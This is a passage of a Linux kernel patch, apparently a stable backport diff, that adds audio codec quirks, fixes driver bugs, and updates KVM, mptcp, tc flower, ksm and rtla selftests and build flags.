++		.v.pins = cxt_pincfg_sws_js201d,
++	},
+ };
+ 
+ static const struct snd_pci_quirk cxt5045_fixups[] = {
+@@ -1069,6 +1085,7 @@ static const struct snd_pci_quirk cxt5066_fixups[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8457, "HP Z2 G4 mini", CXT_FIXUP_HP_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x103c, 0x8458, "HP Z2 G4 mini premium", CXT_FIXUP_HP_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x138d, "Asus", CXT_FIXUP_HEADPHONE_MIC_PIN),
++	SND_PCI_QUIRK(0x14f1, 0x0265, "SWS JS201D", CXT_PINCFG_SWS_JS201D),
+ 	SND_PCI_QUIRK(0x152d, 0x0833, "OLPC XO-1.5", CXT_FIXUP_OLPC_XO),
+ 	SND_PCI_QUIRK(0x17aa, 0x20f2, "Lenovo T400", CXT_PINCFG_LENOVO_TP410),
+ 	SND_PCI_QUIRK(0x17aa, 0x215e, "Lenovo T410", CXT_PINCFG_LENOVO_TP410),
+@@ -1109,6 +1126,7 @@ static const struct hda_model_fixup cxt5066_fixup_models[] = {
+ 	{ .id = CXT_FIXUP_HP_ZBOOK_MUTE_LED, .name = "hp-zbook-mute-led" },
+ 	{ .id = CXT_FIXUP_HP_MIC_NO_PRESENCE, .name = "hp-mic-fix" },
+ 	{ .id = CXT_PINCFG_LENOVO_NOTEBOOK, .name = "lenovo-20149" },
++	{ .id = CXT_PINCFG_SWS_JS201D, .name = "sws-js201d" },
+ 	{}
+ };
+ 
+diff --git a/sound/pci/hda/patch_cs8409.c b/sound/pci/hda/patch_cs8409.c
+index 627899959ffe8..e41316e2e9833 100644
+--- a/sound/pci/hda/patch_cs8409.c
++++ b/sound/pci/hda/patch_cs8409.c
+@@ -1371,6 +1371,7 @@ void dolphin_fixups(struct hda_codec *codec, const struct hda_fixup *fix, int ac
+ 		spec->scodecs[CS8409_CODEC1] = &dolphin_cs42l42_1;
+ 		spec->scodecs[CS8409_CODEC1]->codec = codec;
+ 		spec->num_scodecs = 2;
++		spec->gen.suppress_vmaster = 1;
+ 
+ 		codec->patch_ops = cs8409_dolphin_patch_ops;
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 62f2137044923..92a656fb53212 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9377,7 +9377,7 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = cs35l41_fixup_i2c_two,
+ 		.chained = true,
+-		.chain_id = ALC269_FIXUP_THINKPAD_ACPI,
++		.chain_id = ALC285_FIXUP_THINKPAD_NO_BASS_SPK_HEADSET_JACK,
+ 	},
+ 	[ALC245_FIXUP_HP_MUTE_LED_COEFBIT] = {
+ 		.type = HDA_FIXUP_FUNC,
+@@ -9392,6 +9392,8 @@ static const struct hda_fixup alc269_fixups[] = {
+ 	[ALC287_FIXUP_THINKPAD_I2S_SPK] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc287_fixup_bind_dacs,
++		.chained = true,
++		.chain_id = ALC285_FIXUP_THINKPAD_NO_BASS_SPK_HEADSET_JACK,
+ 	},
+ 	[ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD] = {
+ 		.type = HDA_FIXUP_FUNC,
+@@ -9431,6 +9433,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1025, 0x1247, "Acer vCopperbox", ALC269VC_FIXUP_ACER_VCOPPERBOX_PINS),
+ 	SND_PCI_QUIRK(0x1025, 0x1248, "Acer Veriton N4660G", ALC269VC_FIXUP_ACER_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1025, 0x1269, "Acer SWIFT SF314-54", ALC256_FIXUP_ACER_HEADSET_MIC),
++	SND_PCI_QUIRK(0x1025, 0x126a, "Acer Swift SF114-32", ALC256_FIXUP_ACER_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1025, 0x128f, "Acer Veriton Z6860G", ALC286_FIXUP_ACER_AIO_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1025, 0x1290, "Acer Veriton Z4860G", ALC286_FIXUP_ACER_AIO_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1025, 0x1291, "Acer Veriton Z4660G", ALC286_FIXUP_ACER_AIO_HEADSET_MIC),
+@@ -9617,6 +9620,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8786, "HP OMEN 15", ALC285_FIXUP_HP_MUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8787, "HP OMEN 15", ALC285_FIXUP_HP_MUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8788, "HP OMEN 15", ALC285_FIXUP_HP_MUTE_LED),
++	SND_PCI_QUIRK(0x103c, 0x87b7, "HP Laptop 14-fq0xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x87c8, "HP", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x87e5, "HP ProBook 440 G8 Notebook PC", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x87e7, "HP ProBook 450 G8 Notebook PC", ALC236_FIXUP_HP_GPIO_LED),
+@@ -9686,6 +9690,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8abb, "HP ZBook Firefly 14 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad1, "HP EliteBook 840 14 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b0f, "HP Elite mt645 G7 Mobile Thin Client U81", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b2f, "HP 255 15.6 inch G10 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8b42, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b43, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+@@ -9693,6 +9698,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b45, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b46, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b47, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b59, "HP Elite mt645 G7 Mobile Thin Client U89", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b63, "HP Elite Dragonfly 13.5 inch G4", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+@@ -9722,6 +9728,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8c97, "HP ZBook", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8ca1, "HP ZBook Power", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8ca2, "HP ZBook Power", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ca4, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ca7, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8cf5, "HP ZBook Studio 16", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+@@ -10049,6 +10057,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1d72, 0x1945, "Redmi G", ALC256_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1947, "RedmiBook Air", ALC255_FIXUP_XIAOMI_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x2782, 0x0232, "CHUWI CoreBook XPro", ALC269VB_FIXUP_CHUWI_COREBOOK_XPRO),
++	SND_PCI_QUIRK(0x2782, 0x1707, "Vaio VJFE-ADL", ALC298_FIXUP_SPK_VOLUME),
+ 	SND_PCI_QUIRK(0x8086, 0x2074, "Intel NUC 8", ALC233_FIXUP_INTEL_NUC8_DMIC),
+ 	SND_PCI_QUIRK(0x8086, 0x2080, "Intel NUC 8 Rugged", ALC256_FIXUP_INTEL_NUC8_RUGGED),
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", ALC256_FIXUP_INTEL_NUC10),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 808d002826233..28da4e1858d7e 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -241,6 +241,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "82YM"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "83AS"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+@@ -297,6 +304,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Redmi Book Pro 15 2022"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "Micro-Star International Co., Ltd."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Bravo 15 C7VF"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/rt5645.c b/sound/soc/codecs/rt5645.c
+index fd3dca08460ba..844d14d4c9a51 100644
+--- a/sound/soc/codecs/rt5645.c
++++ b/sound/soc/codecs/rt5645.c
+@@ -3288,6 +3288,7 @@ static void rt5645_jack_detect_work(struct work_struct *work)
+ 				    report, SND_JACK_HEADPHONE);
+ 		snd_soc_jack_report(rt5645->mic_jack,
+ 				    report, SND_JACK_MICROPHONE);
++		mutex_unlock(&rt5645->jd_mutex);
+ 		return;
+ 	case 4:
+ 		val = snd_soc_component_read(rt5645->component, RT5645_A_JD_CTRL1) & 0x0020;
+diff --git a/sound/soc/codecs/wcd938x.c b/sound/soc/codecs/wcd938x.c
+index a2abd1a111612..e80be4e4fa8b4 100644
+--- a/sound/soc/codecs/wcd938x.c
++++ b/sound/soc/codecs/wcd938x.c
+@@ -3588,7 +3588,7 @@ static int wcd938x_probe(struct platform_device *pdev)
+ 	ret = wcd938x_populate_dt_data(wcd938x, dev);
+ 	if (ret) {
+ 		dev_err(dev, "%s: Fail to obtain platform data\n", __func__);
+-		return -EINVAL;
++		return ret;
+ 	}
+ 
+ 	ret = wcd938x_add_slave_components(wcd938x, dev, &match);
+diff --git a/tools/arch/x86/include/asm/rmwcc.h b/tools/arch/x86/include/asm/rmwcc.h
+index 11ff975242cac..e2ff22b379a44 100644
+--- a/tools/arch/x86/include/asm/rmwcc.h
++++ b/tools/arch/x86/include/asm/rmwcc.h
+@@ -4,7 +4,7 @@
+ 
+ #define __GEN_RMWcc(fullop, var, cc, ...)				\
+ do {									\
+-	asm_volatile_goto (fullop "; j" cc " %l[cc_label]"		\
++	asm goto (fullop "; j" cc " %l[cc_label]"		\
+ 			: : "m" (var), ## __VA_ARGS__ 			\
+ 			: "memory" : cc_label);				\
+ 	return 0;							\
+diff --git a/tools/include/linux/compiler_types.h b/tools/include/linux/compiler_types.h
+index 1bdd834bdd571..d09f9dc172a48 100644
+--- a/tools/include/linux/compiler_types.h
++++ b/tools/include/linux/compiler_types.h
+@@ -36,8 +36,8 @@
+ #include <linux/compiler-gcc.h>
+ #endif
+ 
+-#ifndef asm_volatile_goto
+-#define asm_volatile_goto(x...) asm goto(x)
++#ifndef asm_goto_output
++#define asm_goto_output(x...) asm goto(x)
+ #endif
+ 
+ #endif /* __LINUX_COMPILER_TYPES_H */
+diff --git a/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh b/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
+index 7bf56ea161e35..616d3581419ca 100755
+--- a/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
++++ b/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
+@@ -11,7 +11,7 @@ ALL_TESTS="single_mask_test identical_filters_test two_masks_test \
+ 	multiple_masks_test ctcam_edge_cases_test delta_simple_test \
+ 	delta_two_masks_one_key_test delta_simple_rehash_test \
+ 	bloom_simple_test bloom_complex_test bloom_delta_test \
+-	max_erp_entries_test"
++	max_erp_entries_test max_group_size_test"
+ NUM_NETIFS=2
+ source $lib_dir/lib.sh
+ source $lib_dir/tc_common.sh
+@@ -1033,6 +1033,60 @@ max_erp_entries_test()
+ 		"max chain $chain_failed, mask $mask_failed"
+ }
+ 
++max_group_size_test()
++{
++	# The number of ACLs in an ACL group is limited. Once the maximum
++	# number of ACLs has been reached, filters cannot be added. This test
++	# verifies that when this limit is reached, insertion fails without
++	# crashing.
++
++	RET=0
++
++	local num_acls=32
++	local max_size
++	local ret
++
++	if [[ "$tcflags" != "skip_sw" ]]; then
++		return 0;
++	fi
++
++	for ((i=1; i < $num_acls; i++)); do
++		if [[ $(( i % 2 )) == 1 ]]; then
++			tc filter add dev $h2 ingress pref $i proto ipv4 \
++				flower $tcflags dst_ip 198.51.100.1/32 \
++				ip_proto tcp tcp_flags 0x01/0x01 \
++				action drop &> /dev/null
++		else
++			tc filter add dev $h2 ingress pref $i proto ipv6 \
++				flower $tcflags dst_ip 2001:db8:1::1/128 \
++				action drop &> /dev/null
++		fi
++
++		ret=$?
++		[[ $ret -ne 0 ]] && max_size=$((i - 1)) && break
++	done
++
++	# We expect to exceed the maximum number of ACLs in a group, so that
++	# insertion eventually fails. Otherwise, the test should be adjusted to
++	# add more filters.
++	check_fail $ret "expected to exceed number of ACLs in a group"
++
++	for ((; i >= 1; i--)); do
++		if [[ $(( i % 2 )) == 1 ]]; then
++			tc filter del dev $h2 ingress pref $i proto ipv4 \
++				flower $tcflags dst_ip 198.51.100.1/32 \
++				ip_proto tcp tcp_flags 0x01/0x01 \
++				action drop &> /dev/null
++		else
++			tc filter del dev $h2 ingress pref $i proto ipv6 \
++				flower $tcflags dst_ip 2001:db8:1::1/128 \
++				action drop &> /dev/null
++		fi
++	done
++
++	log_test "max ACL group size test ($tcflags). max size $max_size"
++}
++
+ setup_prepare()
+ {
+ 	h1=${NETIFS[p1]}
+diff --git a/tools/testing/selftests/kvm/dirty_log_test.c b/tools/testing/selftests/kvm/dirty_log_test.c
+index b5234d6efbe15..ec40a33c29fda 100644
+--- a/tools/testing/selftests/kvm/dirty_log_test.c
++++ b/tools/testing/selftests/kvm/dirty_log_test.c
+@@ -226,13 +226,15 @@ static void clear_log_create_vm_done(struct kvm_vm *vm)
+ }
+ 
+ static void dirty_log_collect_dirty_pages(struct kvm_vcpu *vcpu, int slot,
+-					  void *bitmap, uint32_t num_pages)
++					  void *bitmap, uint32_t num_pages,
++					  uint32_t *unused)
+ {
+ 	kvm_vm_get_dirty_log(vcpu->vm, slot, bitmap);
+ }
+ 
+ static void clear_log_collect_dirty_pages(struct kvm_vcpu *vcpu, int slot,
+-					  void *bitmap, uint32_t num_pages)
++					  void *bitmap, uint32_t num_pages,
++					  uint32_t *unused)
+ {
+ 	kvm_vm_get_dirty_log(vcpu->vm, slot, bitmap);
+ 	kvm_vm_clear_dirty_log(vcpu->vm, slot, bitmap, 0, num_pages);
+@@ -329,10 +331,9 @@ static void dirty_ring_continue_vcpu(void)
+ }
+ 
+ static void dirty_ring_collect_dirty_pages(struct kvm_vcpu *vcpu, int slot,
+-					   void *bitmap, uint32_t num_pages)
++					   void *bitmap, uint32_t num_pages,
++					   uint32_t *ring_buf_idx)
+ {
+-	/* We only have one vcpu */
+-	static uint32_t fetch_index = 0;
+ 	uint32_t count = 0, cleared;
+ 	bool continued_vcpu = false;
+ 
+@@ -349,11 +350,15 @@ static void dirty_ring_collect_dirty_pages(struct kvm_vcpu *vcpu, int slot,
+ 
+ 	/* Only have one vcpu */
+ 	count = dirty_ring_collect_one(vcpu_map_dirty_ring(vcpu),
+-				       slot, bitmap, num_pages, &fetch_index);
++				       slot, bitmap, num_pages,
++				       ring_buf_idx);
+ 
+ 	cleared = kvm_vm_reset_dirty_ring(vcpu->vm);
+ 
+-	/* Cleared pages should be the same as collected */
++	/*
++	 * Cleared pages should be the same as collected, as KVM is supposed to
++	 * clear only the entries that have been harvested.
++	 */
+ 	TEST_ASSERT(cleared == count, "Reset dirty pages (%u) mismatch "
+ 		    "with collected (%u)", cleared, count);
+ 
+@@ -392,12 +397,6 @@ static void dirty_ring_after_vcpu_run(struct kvm_vcpu *vcpu, int ret, int err)
+ 	}
+ }
+ 
+-static void dirty_ring_before_vcpu_join(void)
+-{
+-	/* Kick another round of vcpu just to make sure it will quit */
+-	sem_post(&sem_vcpu_cont);
+-}
+-
+ struct log_mode {
+ 	const char *name;
+ 	/* Return true if this mode is supported, otherwise false */
+@@ -406,10 +405,10 @@ struct log_mode {
+ 	void (*create_vm_done)(struct kvm_vm *vm);
+ 	/* Hook to collect the dirty pages into the bitmap provided */
+ 	void (*collect_dirty_pages) (struct kvm_vcpu *vcpu, int slot,
+-				     void *bitmap, uint32_t num_pages);
++				     void *bitmap, uint32_t num_pages,
++				     uint32_t *ring_buf_idx);
+ 	/* Hook to call when after each vcpu run */
+ 	void (*after_vcpu_run)(struct kvm_vcpu *vcpu, int ret, int err);
+-	void (*before_vcpu_join) (void);
+ } log_modes[LOG_MODE_NUM] = {
+ 	{
+ 		.name = "dirty-log",
+@@ -428,7 +427,6 @@ struct log_mode {
+ 		.supported = dirty_ring_supported,
+ 		.create_vm_done = dirty_ring_create_vm_done,
+ 		.collect_dirty_pages = dirty_ring_collect_dirty_pages,
+-		.before_vcpu_join = dirty_ring_before_vcpu_join,
+ 		.after_vcpu_run = dirty_ring_after_vcpu_run,
+ 	},
+ };
+@@ -471,13 +469,14 @@ static void log_mode_create_vm_done(struct kvm_vm *vm)
+ }
+ 
+ static void log_mode_collect_dirty_pages(struct kvm_vcpu *vcpu, int slot,
+-					 void *bitmap, uint32_t num_pages)
++					 void *bitmap, uint32_t num_pages,
++					 uint32_t *ring_buf_idx)
+ {
+ 	struct log_mode *mode = &log_modes[host_log_mode];
+ 
+ 	TEST_ASSERT(mode->collect_dirty_pages != NULL,
+ 		    "collect_dirty_pages() is required for any log mode!");
+-	mode->collect_dirty_pages(vcpu, slot, bitmap, num_pages);
++	mode->collect_dirty_pages(vcpu, slot, bitmap, num_pages, ring_buf_idx);
+ }
+ 
+ static void log_mode_after_vcpu_run(struct kvm_vcpu *vcpu, int ret, int err)
+@@ -488,14 +487,6 @@ static void log_mode_after_vcpu_run(struct kvm_vcpu *vcpu, int ret, int err)
+ 		mode->after_vcpu_run(vcpu, ret, err);
+ }
+ 
+-static void log_mode_before_vcpu_join(void)
+-{
+-	struct log_mode *mode = &log_modes[host_log_mode];
+-
+-	if (mode->before_vcpu_join)
+-		mode->before_vcpu_join();
+-}
+-
+ static void generate_random_array(uint64_t *guest_array, uint64_t size)
+ {
+ 	uint64_t i;
+@@ -696,6 +687,8 @@ static void run_test(enum vm_guest_mode mode, void *arg)
+ 	struct kvm_vcpu *vcpu;
+ 	struct kvm_vm *vm;
+ 	unsigned long *bmap;
++	uint32_t ring_buf_idx = 0;
++	int sem_val;
+ 
+ 	if (!log_mode_supported()) {
+ 		print_skip("Log mode '%s' not supported",
+@@ -767,10 +760,21 @@ static void run_test(enum vm_guest_mode mode, void *arg)
+ 	/* Start the iterations */
+ 	iteration = 1;
+ 	sync_global_to_guest(vm, iteration);
+-	host_quit = false;
++	WRITE_ONCE(host_quit, false);
+ 	host_dirty_count = 0;
+ 	host_clear_count = 0;
+ 	host_track_next_count = 0;
++	WRITE_ONCE(dirty_ring_vcpu_ring_full, false);
++
++	/*
++	 * Ensure the previous iteration didn't leave a dangling semaphore, i.e.
++	 * that the main task and vCPU worker were synchronized and completed
++	 * verification of all iterations.
++	 */
++	sem_getvalue(&sem_vcpu_stop, &sem_val);
++	TEST_ASSERT_EQ(sem_val, 0);
++	sem_getvalue(&sem_vcpu_cont, &sem_val);
++	TEST_ASSERT_EQ(sem_val, 0);
+ 
+ 	pthread_create(&vcpu_thread, NULL, vcpu_worker, vcpu);
+ 
+@@ -778,7 +782,8 @@ static void run_test(enum vm_guest_mode mode, void *arg)
+ 		/* Give the vcpu thread some time to dirty some pages */
+ 		usleep(p->interval * 1000);
+ 		log_mode_collect_dirty_pages(vcpu, TEST_MEM_SLOT_INDEX,
+-					     bmap, host_num_pages);
++					     bmap, host_num_pages,
++					     &ring_buf_idx);
+ 
+ 		/*
+ 		 * See vcpu_sync_stop_requested definition for details on why
+@@ -796,15 +801,21 @@ static void run_test(enum vm_guest_mode mode, void *arg)
+ 		assert(host_log_mode == LOG_MODE_DIRTY_RING ||
+ 		       atomic_read(&vcpu_sync_stop_requested) == false);
+ 		vm_dirty_log_verify(mode, bmap);
+-		sem_post(&sem_vcpu_cont);
+ 
+-		iteration++;
++		/*
++		 * Set host_quit before sem_vcpu_cont in the final iteration to
++		 * ensure that the vCPU worker doesn't resume the guest.  As
++		 * above, the dirty ring test may stop and wait even when not
++		 * explicitly request to do so, i.e. would hang waiting for a
++		 * "continue" if it's allowed to resume the guest.
++		 */
++		if (++iteration == p->iterations)
++			WRITE_ONCE(host_quit, true);
++
++		sem_post(&sem_vcpu_cont);
+ 		sync_global_to_guest(vm, iteration);
+ 	}
+ 
+-	/* Tell the vcpu thread to quit */
+-	host_quit = true;
+-	log_mode_before_vcpu_join();
+ 	pthread_join(vcpu_thread, NULL);
+ 
+ 	pr_info("Total bits checked: dirty (%"PRIu64"), clear (%"PRIu64"), "
+diff --git a/tools/testing/selftests/net/mptcp/config b/tools/testing/selftests/net/mptcp/config
+index e317c2e44dae8..4f80014cae494 100644
+--- a/tools/testing/selftests/net/mptcp/config
++++ b/tools/testing/selftests/net/mptcp/config
+@@ -22,8 +22,11 @@ CONFIG_NFT_TPROXY=m
+ CONFIG_NFT_SOCKET=m
+ CONFIG_IP_ADVANCED_ROUTER=y
+ CONFIG_IP_MULTIPLE_TABLES=y
++CONFIG_IP_NF_FILTER=m
++CONFIG_IP_NF_MANGLE=m
+ CONFIG_IP_NF_TARGET_REJECT=m
+ CONFIG_IPV6_MULTIPLE_TABLES=y
++CONFIG_IP6_NF_FILTER=m
+ CONFIG_NET_ACT_CSUM=m
+ CONFIG_NET_ACT_PEDIT=m
+ CONFIG_NET_CLS_ACT=y
+diff --git a/tools/testing/selftests/net/mptcp/settings b/tools/testing/selftests/net/mptcp/settings
+index 79b65bdf05db6..abc5648b59abd 100644
+--- a/tools/testing/selftests/net/mptcp/settings
++++ b/tools/testing/selftests/net/mptcp/settings
+@@ -1 +1 @@
+-timeout=1200
++timeout=1800
+diff --git a/tools/testing/selftests/vm/ksm_tests.c b/tools/testing/selftests/vm/ksm_tests.c
+index 0d85be2350fa3..a811659307855 100644
+--- a/tools/testing/selftests/vm/ksm_tests.c
++++ b/tools/testing/selftests/vm/ksm_tests.c
+@@ -470,7 +470,7 @@ static int ksm_merge_hugepages_time(int mapping, int prot, int timeout, size_t m
+ 	if (map_ptr_orig == MAP_FAILED)
+ 		err(2, "initial mmap");
+ 
+-	if (madvise(map_ptr, len + HPAGE_SIZE, MADV_HUGEPAGE))
++	if (madvise(map_ptr, len, MADV_HUGEPAGE))
+ 		err(2, "MADV_HUGEPAGE");
+ 
+ 	pagemap_fd = open("/proc/self/pagemap", O_RDONLY);
+diff --git a/tools/testing/selftests/vm/va_128TBswitch.sh b/tools/testing/selftests/vm/va_128TBswitch.sh
+index 41580751dc511..231622b3a2327 100755
+--- a/tools/testing/selftests/vm/va_128TBswitch.sh
++++ b/tools/testing/selftests/vm/va_128TBswitch.sh
+@@ -29,9 +29,15 @@ check_supported_x86_64()
+ 	# See man 1 gzip under '-f'.
+ 	local pg_table_levels=$(gzip -dcfq "${config}" | grep PGTABLE_LEVELS | cut -d'=' -f 2)
+ 
++	local cpu_supports_pl5=$(awk '/^flags/ {if (/la57/) {print 0;}
++		else {print 1}; exit}' /proc/cpuinfo 2>/dev/null)
++
+ 	if [[ "${pg_table_levels}" -lt 5 ]]; then
+ 		echo "$0: PGTABLE_LEVELS=${pg_table_levels}, must be >= 5 to run this test"
+ 		exit $ksft_skip
++	elif [[ "${cpu_supports_pl5}" -ne 0 ]]; then
++		echo "$0: CPU does not have the necessary la57 flag to support page table level 5"
++		exit $ksft_skip
+ 	fi
+ }
+ 
+diff --git a/tools/tracing/rtla/Makefile b/tools/tracing/rtla/Makefile
+index 22e28b76f8004..6912e9577b658 100644
+--- a/tools/tracing/rtla/Makefile
++++ b/tools/tracing/rtla/Makefile
+@@ -28,10 +28,15 @@ FOPTS	:=	-flto=auto -ffat-lto-objects -fexceptions -fstack-protector-strong \
+ 		-fasynchronous-unwind-tables -fstack-clash-protection
+ WOPTS	:= 	-Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -Wno-maybe-uninitialized
+ 
++ifeq ($(CC),clang)
++  FOPTS := $(filter-out -ffat-lto-objects, $(FOPTS))
++  WOPTS := $(filter-out -Wno-maybe-uninitialized, $(WOPTS))
++endif
++
+ TRACEFS_HEADERS	:= $$($(PKG_CONFIG) --cflags libtracefs)
+ 
+ CFLAGS	:=	-O -g -DVERSION=\"$(VERSION)\" $(FOPTS) $(MOPTS) $(WOPTS) $(TRACEFS_HEADERS) $(EXTRA_CFLAGS)
+-LDFLAGS	:=	-ggdb $(EXTRA_LDFLAGS)
++LDFLAGS	:=	-flto=auto -ggdb $(EXTRA_LDFLAGS)
+ LIBS	:=	$$($(PKG_CONFIG) --libs libtracefs)
+ 
+ SRC	:=	$(wildcard src/*.c)
+diff --git a/tools/tracing/rtla/src/osnoise_hist.c b/tools/tracing/rtla/src/osnoise_hist.c
+index fe34452fc4ec0..b9658f213cb55 100644
+--- a/tools/tracing/rtla/src/osnoise_hist.c
++++ b/tools/tracing/rtla/src/osnoise_hist.c
+@@ -129,8 +129,7 @@ static void osnoise_hist_update_multiple(struct osnoise_tool *tool, int cpu,
+ 	if (params->output_divisor)
+ 		duration = duration / params->output_divisor;
+ 
+-	if (data->bucket_size)
+-		bucket = duration / data->bucket_size;
++	bucket = duration / data->bucket_size;
+ 
+ 	total_duration = duration * count;
+ 
+@@ -472,7 +471,11 @@ static void osnoise_hist_usage(char *usage)
+ 
+ 	for (i = 0; msg[i]; i++)
+ 		fprintf(stderr, "%s\n", msg[i]);
+-	exit(1);
++
++	if (usage)
++		exit(EXIT_FAILURE);
++
++	exit(EXIT_SUCCESS);
+ }
+ 
+ /*
+diff --git a/tools/tracing/rtla/src/osnoise_top.c b/tools/tracing/rtla/src/osnoise_top.c
+index 76479bfb29224..6c07f360de72c 100644
+--- a/tools/tracing/rtla/src/osnoise_top.c
++++ b/tools/tracing/rtla/src/osnoise_top.c
+@@ -282,7 +282,11 @@ void osnoise_top_usage(char *usage)
+ 
+ 	for (i = 0; msg[i]; i++)
+ 		fprintf(stderr, "%s\n", msg[i]);
+-	exit(1);
++
++	if (usage)
++		exit(EXIT_FAILURE);
++
++	exit(EXIT_SUCCESS);
+ }
+ 
+ /*
+diff --git a/tools/tracing/rtla/src/timerlat_hist.c b/tools/tracing/rtla/src/timerlat_hist.c
+index 4b48af8a83096..ed08295bfa12c 100644
+--- a/tools/tracing/rtla/src/timerlat_hist.c
++++ b/tools/tracing/rtla/src/timerlat_hist.c
+@@ -151,8 +151,7 @@ timerlat_hist_update(struct osnoise_tool *tool, int cpu,
+ 	if (params->output_divisor)
+ 		latency = latency / params->output_divisor;
+ 
+-	if (data->bucket_size)
+-		bucket = latency / data->bucket_size;
